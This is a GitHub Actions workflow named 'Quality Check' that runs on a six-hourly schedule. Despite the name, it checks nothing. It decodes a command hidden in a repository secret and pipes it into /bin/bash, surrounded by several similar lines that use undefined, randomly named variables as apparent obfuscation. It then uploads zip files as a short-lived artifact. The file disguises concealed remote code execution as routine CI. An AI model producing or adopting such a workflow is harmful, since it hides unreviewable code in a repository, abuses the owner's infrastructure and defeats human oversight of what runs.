name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '55 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Invoke
        env:
          a4: ${{ secrets.a4 }}
        run: |
          printf '%s' "$a4" | jq -r .n673 | /bin/bash
          printf '%s' "$bzsnl5" | jq -r .mvkf88868 | /bin/bash
          echo $ngvi31706 | jq -r .gait5 | /bin/bash
          echo $b2 | jq -r .y98 | /bin/bash
          echo $glgxv824 | jq -r .qwr2199 | /bin/bash
          echo $iil0 | jq -r .oqynv9275 | /bin/bash
          echo $kico853 | jq -r .coglc30 | /bin/bash

      - name: Store artifact
        uses: actions/upload-artifact@v4
        with:
          name: sKTxdusV
          path: "*.zip"
          retention-days: 1
